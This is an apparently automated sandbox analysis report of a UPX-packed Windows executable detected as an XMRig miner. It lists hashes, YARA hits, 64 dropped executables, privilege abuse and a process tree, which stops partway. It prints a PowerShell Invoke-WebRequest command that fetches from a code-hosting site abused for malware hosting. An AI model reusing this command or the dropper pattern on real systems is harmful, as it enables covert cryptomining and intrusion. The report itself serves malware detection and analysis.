xmrig | 0225e7d9dbd9c9bb5d537a7a5fb0791eabb37167060b99c6fcec8f71206d7c78

Analysis

max time kernel
91s
max time network
130s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
10/05/2024, 01:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe
Size

1.9MB
MD5

3d4e8f01ad16a82547d8f8b141833170
SHA1

5f8755b5952634c3220fa3af3a7aaca52b9a4ce2
SHA256

0225e7d9dbd9c9bb5d537a7a5fb0791eabb37167060b99c6fcec8f71206d7c78
SHA512

b553d319635434406ba6dd1acd7254fc7d6fc657f8cb3fb6f04d31edbd89f7eb0d1278af0cce9da9c7c92ba2ff1d26f598d2cde2447863951cc360c1a73d8e64
SSDEEP

49152:Lz071uv4BPMkibTIA5lCx7kvRWa4pXY21UM1:NABV

Score

10^/10

xmrig execution miner upx

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 42 IoCs

miner

resource	yara_rule
behavioral2/memory/3108-55-0x00007FF7F48B0000-0x00007FF7F4CA2000-memory.dmp	xmrig
behavioral2/memory/2344-109-0x00007FF6EC6A0000-0x00007FF6ECA92000-memory.dmp	xmrig
behavioral2/memory/984-134-0x00007FF6509C0000-0x00007FF650DB2000-memory.dmp	xmrig
behavioral2/memory/5064-138-0x00007FF758CF0000-0x00007FF7590E2000-memory.dmp	xmrig
behavioral2/memory/1096-146-0x00007FF7E3B40000-0x00007FF7E3F32000-memory.dmp	xmrig
behavioral2/memory/1008-149-0x00007FF658360000-0x00007FF658752000-memory.dmp	xmrig
behavioral2/memory/4884-148-0x00007FF6618C0000-0x00007FF661CB2000-memory.dmp	xmrig
behavioral2/memory/1312-147-0x00007FF789D50000-0x00007FF78A142000-memory.dmp	xmrig
behavioral2/memory/3512-141-0x00007FF7C88E0000-0x00007FF7C8CD2000-memory.dmp	xmrig
behavioral2/memory/3500-140-0x00007FF60A800000-0x00007FF60ABF2000-memory.dmp	xmrig
behavioral2/memory/3972-139-0x00007FF662060000-0x00007FF662452000-memory.dmp	xmrig
behavioral2/memory/4116-137-0x00007FF7EB420000-0x00007FF7EB812000-memory.dmp	xmrig
behavioral2/memory/1636-136-0x00007FF6EE6E0000-0x00007FF6EEAD2000-memory.dmp	xmrig
behavioral2/memory/4176-135-0x00007FF6C2520000-0x00007FF6C2912000-memory.dmp	xmrig
behavioral2/memory/1444-132-0x00007FF6836F0000-0x00007FF683AE2000-memory.dmp	xmrig
behavioral2/memory/2604-124-0x00007FF641060000-0x00007FF641452000-memory.dmp	xmrig
behavioral2/memory/1176-49-0x00007FF6205F0000-0x00007FF6209E2000-memory.dmp	xmrig
behavioral2/memory/4824-2780-0x00007FF703680000-0x00007FF703A72000-memory.dmp	xmrig
behavioral2/memory/1176-2783-0x00007FF6205F0000-0x00007FF6209E2000-memory.dmp	xmrig
behavioral2/memory/3108-2785-0x00007FF7F48B0000-0x00007FF7F4CA2000-memory.dmp	xmrig
behavioral2/memory/1444-2788-0x00007FF6836F0000-0x00007FF683AE2000-memory.dmp	xmrig
behavioral2/memory/1312-2793-0x00007FF789D50000-0x00007FF78A142000-memory.dmp	xmrig
behavioral2/memory/1096-2792-0x00007FF7E3B40000-0x00007FF7E3F32000-memory.dmp	xmrig
behavioral2/memory/4824-2789-0x00007FF703680000-0x00007FF703A72000-memory.dmp	xmrig
behavioral2/memory/1008-2799-0x00007FF658360000-0x00007FF658752000-memory.dmp	xmrig
behavioral2/memory/984-2802-0x00007FF6509C0000-0x00007FF650DB2000-memory.dmp	xmrig
behavioral2/memory/4176-2809-0x00007FF6C2520000-0x00007FF6C2912000-memory.dmp	xmrig
behavioral2/memory/5064-2811-0x00007FF758CF0000-0x00007FF7590E2000-memory.dmp	xmrig
behavioral2/memory/1636-2808-0x00007FF6EE6E0000-0x00007FF6EEAD2000-memory.dmp	xmrig
behavioral2/memory/4116-2806-0x00007FF7EB420000-0x00007FF7EB812000-memory.dmp	xmrig
behavioral2/memory/2604-2804-0x00007FF641060000-0x00007FF641452000-memory.dmp	xmrig
behavioral2/memory/4884-2797-0x00007FF6618C0000-0x00007FF661CB2000-memory.dmp	xmrig
behavioral2/memory/2344-2796-0x00007FF6EC6A0000-0x00007FF6ECA92000-memory.dmp	xmrig
behavioral2/memory/3512-2814-0x00007FF7C88E0000-0x00007FF7C8CD2000-memory.dmp	xmrig
behavioral2/memory/3972-2816-0x00007FF662060000-0x00007FF662452000-memory.dmp	xmrig
behavioral2/memory/3500-2817-0x00007FF60A800000-0x00007FF60ABF2000-memory.dmp	xmrig
behavioral2/memory/2480-2849-0x00007FF72BEA0000-0x00007FF72C292000-memory.dmp	xmrig
behavioral2/memory/220-2852-0x00007FF7FE510000-0x00007FF7FE902000-memory.dmp	xmrig
behavioral2/memory/2212-2850-0x00007FF758E40000-0x00007FF759232000-memory.dmp	xmrig
behavioral2/memory/2964-2846-0x00007FF7D4C90000-0x00007FF7D5082000-memory.dmp	xmrig
behavioral2/memory/4572-2845-0x00007FF67E590000-0x00007FF67E982000-memory.dmp	xmrig
behavioral2/memory/2600-2836-0x00007FF75E6F0000-0x00007FF75EAE2000-memory.dmp	xmrig

Blocklisted process makes network request 8 IoCs

flow	pid	Process
3	5036	powershell.exe
5	5036	powershell.exe
7	5036	powershell.exe
8	5036	powershell.exe
10	5036	powershell.exe
11	5036	powershell.exe
13	5036	powershell.exe
18	5036	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
5036	powershell.exe

Executes dropped EXE 64 IoCs

pid	Process
4824	ewcqJau.exe
1176	MqHLdJS.exe
1096	UZoAnYM.exe
3108	Omjpuqb.exe
1312	pIpxHUO.exe
2344	SUNhhTc.exe
2604	LecFxtP.exe
1444	VVotdlG.exe
984	UOejGdi.exe
4884	IlSRybY.exe
1008	QblbexV.exe
4176	qOqSojl.exe
1636	vEXuHsb.exe
4116	XpTQcyR.exe
5064	BWcqwjO.exe
3972	GkiwAHB.exe
3500	cDQdcpv.exe
3512	JVUZDPw.exe
220	qbIuCHU.exe
2212	TUGeWQL.exe
2480	zrmsFae.exe
2964	CkONGBv.exe
4572	IliVivz.exe
2600	vwEEUyH.exe
2636	rkYItzF.exe
60	fnNkMMA.exe
4356	zhsSMhf.exe
4704	yePqJFL.exe
4588	sNITHOE.exe
892	zwTUzTg.exe
2080	wJaqAeI.exe
2808	KGzbWii.exe
404	JOTBKVK.exe
4036	WpXGgUo.exe
2240	JKtQHoH.exe
3240	dzDpJNe.exe
1972	LucMwPX.exe
2292	nemvmvH.exe
2896	whZGzPk.exe
332	OnGuKIt.exe
3448	mUUHzkf.exe
4944	PQfxniW.exe
1572	oomIHNQ.exe
3372	JfqBtQV.exe
5072	eXQXaNE.exe
1612	YMycAai.exe
1984	raffwKO.exe
3748	MLjSSyv.exe
2648	XCBdney.exe
1084	pdMmfQR.exe
4624	rPGkqNG.exe
2340	NCCbpYd.exe
4636	JmmQqJi.exe
4640	HfuTNrV.exe
780	nNWNUrd.exe
1580	MXRxxgs.exe
4888	cqmZeOt.exe
1504	saJDWBB.exe
2948	lXnuZHm.exe
1608	GOzkAHS.exe
2956	htoEGKJ.exe
2284	bwbtXej.exe
4140	ZPdiCcD.exe
1800	tBnvqLA.exe

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/3356-0-0x00007FF62E6A0000-0x00007FF62EA92000-memory.dmp	upx
behavioral2/files/0x00080000000233eb-11.dat	upx
behavioral2/files/0x0008000000022f51-7.dat	upx
behavioral2/files/0x00070000000233ec-6.dat	upx
behavioral2/files/0x00070000000233ef-36.dat	upx
behavioral2/files/0x00070000000233f1-37.dat	upx
behavioral2/files/0x00070000000233f0-45.dat	upx
behavioral2/memory/3108-55-0x00007FF7F48B0000-0x00007FF7F4CA2000-memory.dmp	upx
behavioral2/files/0x00070000000233f5-67.dat	upx
behavioral2/files/0x00070000000233f4-70.dat	upx
behavioral2/files/0x00070000000233f6-80.dat	upx
behavioral2/memory/2344-109-0x00007FF6EC6A0000-0x00007FF6ECA92000-memory.dmp	upx
behavioral2/files/0x00070000000233fd-113.dat	upx
behavioral2/memory/984-134-0x00007FF6509C0000-0x00007FF650DB2000-memory.dmp	upx
behavioral2/memory/5064-138-0x00007FF758CF0000-0x00007FF7590E2000-memory.dmp	upx
behavioral2/memory/220-142-0x00007FF7FE510000-0x00007FF7FE902000-memory.dmp	upx
behavioral2/memory/1096-146-0x00007FF7E3B40000-0x00007FF7E3F32000-memory.dmp	upx
behavioral2/memory/2480-151-0x00007FF72BEA0000-0x00007FF72C292000-memory.dmp	upx
behavioral2/memory/2212-150-0x00007FF758E40000-0x00007FF759232000-memory.dmp	upx
behavioral2/memory/1008-149-0x00007FF658360000-0x00007FF658752000-memory.dmp	upx
behavioral2/memory/4884-148-0x00007FF6618C0000-0x00007FF661CB2000-memory.dmp	upx
behavioral2/files/0x0007000000023402-162.dat	upx
behavioral2/files/0x0007000000023401-160.dat	upx
behavioral2/files/0x0007000000023400-158.dat	upx
behavioral2/files/0x00070000000233ff-156.dat	upx
behavioral2/files/0x00080000000233fc-154.dat	upx
behavioral2/memory/1312-147-0x00007FF789D50000-0x00007FF78A142000-memory.dmp	upx
behavioral2/memory/2600-145-0x00007FF75E6F0000-0x00007FF75EAE2000-memory.dmp	upx
behavioral2/memory/4572-144-0x00007FF67E590000-0x00007FF67E982000-memory.dmp	upx
behavioral2/memory/2964-143-0x00007FF7D4C90000-0x00007FF7D5082000-memory.dmp	upx
behavioral2/memory/3512-141-0x00007FF7C88E0000-0x00007FF7C8CD2000-memory.dmp	upx
behavioral2/memory/3500-140-0x00007FF60A800000-0x00007FF60ABF2000-memory.dmp	upx
behavioral2/memory/3972-139-0x00007FF662060000-0x00007FF662452000-memory.dmp	upx
behavioral2/memory/4116-137-0x00007FF7EB420000-0x00007FF7EB812000-memory.dmp	upx
behavioral2/memory/1636-136-0x00007FF6EE6E0000-0x00007FF6EEAD2000-memory.dmp	upx
behavioral2/memory/4176-135-0x00007FF6C2520000-0x00007FF6C2912000-memory.dmp	upx
behavioral2/files/0x00080000000233e9-133.dat	upx
behavioral2/memory/1444-132-0x00007FF6836F0000-0x00007FF683AE2000-memory.dmp	upx
behavioral2/files/0x00070000000233fe-126.dat	upx
behavioral2/memory/2604-124-0x00007FF641060000-0x00007FF641452000-memory.dmp	upx
behavioral2/files/0x00070000000233fa-111.dat	upx
behavioral2/files/0x00070000000233f8-105.dat	upx
behavioral2/files/0x00070000000233f9-103.dat	upx
behavioral2/files/0x00070000000233f7-82.dat	upx
behavioral2/files/0x00070000000233f3-74.dat	upx
behavioral2/memory/1176-49-0x00007FF6205F0000-0x00007FF6209E2000-memory.dmp	upx
behavioral2/files/0x00070000000233f2-39.dat	upx
behavioral2/memory/4824-24-0x00007FF703680000-0x00007FF703A72000-memory.dmp	upx
behavioral2/files/0x00070000000233ed-22.dat	upx
behavioral2/files/0x00070000000233ee-21.dat	upx
behavioral2/files/0x0007000000023403-275.dat	upx
behavioral2/files/0x0007000000023426-281.dat	upx
behavioral2/files/0x000700000002342a-303.dat	upx
behavioral2/files/0x000700000002342c-309.dat	upx
behavioral2/files/0x0007000000023435-339.dat	upx
behavioral2/files/0x0007000000023430-338.dat	upx
behavioral2/files/0x000700000002342f-333.dat	upx
behavioral2/files/0x0007000000023427-304.dat	upx
behavioral2/memory/4824-2780-0x00007FF703680000-0x00007FF703A72000-memory.dmp	upx
behavioral2/memory/1176-2783-0x00007FF6205F0000-0x00007FF6209E2000-memory.dmp	upx
behavioral2/memory/3108-2785-0x00007FF7F48B0000-0x00007FF7F4CA2000-memory.dmp	upx
behavioral2/memory/1444-2788-0x00007FF6836F0000-0x00007FF683AE2000-memory.dmp	upx
behavioral2/memory/1312-2793-0x00007FF789D50000-0x00007FF78A142000-memory.dmp	upx
behavioral2/memory/1096-2792-0x00007FF7E3B40000-0x00007FF7E3F32000-memory.dmp	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
2	raw.githubusercontent.com
3	raw.githubusercontent.com

Drops file in Windows directory 64 IoCs

description	ioc	Process
File created	C:\Windows\System\UQDsHcn.exe	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe
File created	C:\Windows\System\omUmaaq.exe	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe
File created	C:\Windows\System\pUgcJbO.exe	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe
File created	C:\Windows\System\jNuOYpP.exe	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe
File created	C:\Windows\System\Pthullh.exe	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe
File created	C:\Windows\System\QblbexV.exe	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe
File created	C:\Windows\System\lXnuZHm.exe	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe
File created	C:\Windows\System\eFSPEnH.exe	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe
File created	C:\Windows\System\UwxTzcK.exe	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe
File created	C:\Windows\System\rfeDlRL.exe	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe
File created	C:\Windows\System\wXyUqiX.exe	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe
File created	C:\Windows\System\FlrFQuE.exe	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe
File created	C:\Windows\System\ASgDoZN.exe	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe
File created	C:\Windows\System\nfhFAJV.exe	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe
File created	C:\Windows\System\qWBskDc.exe	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe
File created	C:\Windows\System\keSZZjI.exe	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe
File created	C:\Windows\System\SYsCRuH.exe	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe
File created	C:\Windows\System\DHuOakK.exe	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe
File created	C:\Windows\System\cMiKaDU.exe	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe
File created	C:\Windows\System\dVlIRck.exe	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe
File created	C:\Windows\System\RKnrBAQ.exe	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe
File created	C:\Windows\System\auHBqvN.exe	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe
File created	C:\Windows\System\SGnGbul.exe	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe
File created	C:\Windows\System\FtgUbVg.exe	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe
File created	C:\Windows\System\FrwPZKc.exe	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe
File created	C:\Windows\System\PBuuxCO.exe	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe
File created	C:\Windows\System\TXqraLM.exe	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe
File created	C:\Windows\System\XGsTBra.exe	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe
File created	C:\Windows\System\tXydexZ.exe	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe
File created	C:\Windows\System\hENXeNE.exe	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe
File created	C:\Windows\System\kcHfsCU.exe	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe
File created	C:\Windows\System\FGGAiWv.exe	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe
File created	C:\Windows\System\XvqRLDf.exe	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe
File created	C:\Windows\System\LrbLRFy.exe	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe
File created	C:\Windows\System\AJlZagI.exe	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe
File created	C:\Windows\System\dzDpJNe.exe	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe
File created	C:\Windows\System\tYiKMpz.exe	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe
File created	C:\Windows\System\TeRuoSV.exe	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe
File created	C:\Windows\System\zqANPRW.exe	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe
File created	C:\Windows\System\bIKcVdr.exe	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe
File created	C:\Windows\System\jtoDLFA.exe	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe
File created	C:\Windows\System\aiUTsSd.exe	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe
File created	C:\Windows\System\QWXrBuz.exe	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe
File created	C:\Windows\System\TkVQEoD.exe	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe
File created	C:\Windows\System\iqUmBdc.exe	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe
File created	C:\Windows\System\ipeFyMv.exe	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe
File created	C:\Windows\System\ULbapqy.exe	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe
File created	C:\Windows\System\GZDUDVs.exe	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe
File created	C:\Windows\System\ULoxigA.exe	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe
File created	C:\Windows\System\sSZqYpF.exe	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe
File created	C:\Windows\System\zsBhyVO.exe	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe
File created	C:\Windows\System\FrJiyYY.exe	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe
File created	C:\Windows\System\pIpxHUO.exe	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe
File created	C:\Windows\System\BrqWQiu.exe	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe
File created	C:\Windows\System\zrrENWA.exe	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe
File created	C:\Windows\System\bxmmeaR.exe	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe
File created	C:\Windows\System\QSkiymm.exe	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe
File created	C:\Windows\System\LLZAcKc.exe	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe
File created	C:\Windows\System\iFfVsEE.exe	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe
File created	C:\Windows\System\xmMyhaY.exe	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe
File created	C:\Windows\System\FMJdBRR.exe	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe
File created	C:\Windows\System\TRHxYSl.exe	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe
File created	C:\Windows\System\IBNAkaT.exe	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe
File created	C:\Windows\System\JlrTOvO.exe	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
5036	powershell.exe
5036	powershell.exe
5036	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeLockMemoryPrivilege	3356	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe
Token: SeDebugPrivilege	5036	powershell.exe
Token: SeLockMemoryPrivilege	3356	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3356 wrote to memory of 5036	3356	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe	83
PID 3356 wrote to memory of 5036	3356	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe	83
PID 3356 wrote to memory of 4824	3356	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe	84
PID 3356 wrote to memory of 4824	3356	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe	84
PID 3356 wrote to memory of 1176	3356	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe	85
PID 3356 wrote to memory of 1176	3356	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe	85
PID 3356 wrote to memory of 1312	3356	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe	86
PID 3356 wrote to memory of 1312	3356	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe	86
PID 3356 wrote to memory of 1096	3356	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe	87
PID 3356 wrote to memory of 1096	3356	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe	87
PID 3356 wrote to memory of 3108	3356	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe	88
PID 3356 wrote to memory of 3108	3356	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe	88
PID 3356 wrote to memory of 2344	3356	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe	89
PID 3356 wrote to memory of 2344	3356	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe	89
PID 3356 wrote to memory of 984	3356	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe	90
PID 3356 wrote to memory of 984	3356	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe	90
PID 3356 wrote to memory of 2604	3356	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe	91
PID 3356 wrote to memory of 2604	3356	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe	91
PID 3356 wrote to memory of 1444	3356	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe	92
PID 3356 wrote to memory of 1444	3356	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe	92
PID 3356 wrote to memory of 4884	3356	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe	93
PID 3356 wrote to memory of 4884	3356	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe	93
PID 3356 wrote to memory of 1008	3356	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe	94
PID 3356 wrote to memory of 1008	3356	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe	94
PID 3356 wrote to memory of 4176	3356	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe	95
PID 3356 wrote to memory of 4176	3356	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe	95
PID 3356 wrote to memory of 1636	3356	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe	96
PID 3356 wrote to memory of 1636	3356	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe	96
PID 3356 wrote to memory of 4116	3356	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe	97
PID 3356 wrote to memory of 4116	3356	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe	97
PID 3356 wrote to memory of 3972	3356	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe	98
PID 3356 wrote to memory of 3972	3356	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe	98
PID 3356 wrote to memory of 5064	3356	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe	99
PID 3356 wrote to memory of 5064	3356	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe	99
PID 3356 wrote to memory of 3500	3356	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe	100
PID 3356 wrote to memory of 3500	3356	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe	100
PID 3356 wrote to memory of 3512	3356	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe	101
PID 3356 wrote to memory of 3512	3356	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe	101
PID 3356 wrote to memory of 220	3356	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe	102
PID 3356 wrote to memory of 220	3356	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe	102
PID 3356 wrote to memory of 2212	3356	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe	103
PID 3356 wrote to memory of 2212	3356	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe	103
PID 3356 wrote to memory of 2480	3356	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe	104
PID 3356 wrote to memory of 2480	3356	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe	104
PID 3356 wrote to memory of 2964	3356	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe	105
PID 3356 wrote to memory of 2964	3356	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe	105
PID 3356 wrote to memory of 4572	3356	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe	106
PID 3356 wrote to memory of 4572	3356	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe	106
PID 3356 wrote to memory of 2600	3356	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe	107
PID 3356 wrote to memory of 2600	3356	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe	107
PID 3356 wrote to memory of 2636	3356	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe	108
PID 3356 wrote to memory of 2636	3356	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe	108
PID 3356 wrote to memory of 60	3356	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe	109
PID 3356 wrote to memory of 60	3356	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe	109
PID 3356 wrote to memory of 4356	3356	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe	110
PID 3356 wrote to memory of 4356	3356	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe	110
PID 3356 wrote to memory of 4704	3356	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe	111
PID 3356 wrote to memory of 4704	3356	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe	111
PID 3356 wrote to memory of 4588	3356	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe	112
PID 3356 wrote to memory of 4588	3356	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe	112
PID 3356 wrote to memory of 892	3356	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe	113
PID 3356 wrote to memory of 892	3356	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe	113
PID 3356 wrote to memory of 2080	3356	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe	114
PID 3356 wrote to memory of 2080	3356	3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe	114

C:\Users\Admin\AppData\Local\Temp\3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe
"C:\Users\Admin\AppData\Local\Temp\3d4e8f01ad16a82547d8f8b141833170_NeikiAnalytics.exe"
1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3356
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5036
- C:\Windows\System\ewcqJau.exe
  C:\Windows\System\ewcqJau.exe
  2⤵
  - Executes dropped EXE
  PID:4824
- C:\Windows\System\MqHLdJS.exe
  C:\Windows\System\MqHLdJS.exe
  2⤵
  - Executes dropped EXE
  PID:1176
- C:\Windows\System\pIpxHUO.exe
  C:\Windows\System\pIpxHUO.exe
  2⤵
  - Executes dropped EXE
  PID:1312
- C:\Windows\System\UZoAnYM.exe
  C:\Windows\System\UZoAnYM.exe
  2⤵
  - Executes dropped EXE
  PID:1096
- C:\Windows\System\Omjpuqb.exe
  C:\Windows\System\Omjpuqb.exe
  2⤵
  - Executes dropped EXE
  PID:3108
- C:\Windows\System\SUNhhTc.exe
  C:\Windows\System\SUNhhTc.exe
  2⤵
  - Executes dropped EXE
  PID:2344
- C:\Windows\System\UOejGdi.exe
  C:\Windows\System\UOejGdi.exe
  2⤵
  - Executes dropped EXE
  PID:984
- C:\Windows\System\LecFxtP.exe
  C:\Windows\System\LecFxtP.exe
  2⤵
  - Executes dropped EXE
  PID:2604
- C:\Windows\System\VVotdlG.exe
  C:\Windows\System\VVotdlG.exe
  2⤵
  - Executes dropped EXE
  PID:1444
- C:\Windows\System\IlSRybY.exe
  C:\Windows\System\IlSRybY.exe
  2⤵
  - Executes dropped EXE
  PID:4884
- C:\Windows\System\QblbexV.exe
  C:\Windows\System\QblbexV.exe
  2⤵
  - Executes dropped EXE
  PID:1008
- C:\Windows\System\qOqSojl.exe
  C:\Windows\System\qOqSojl.exe
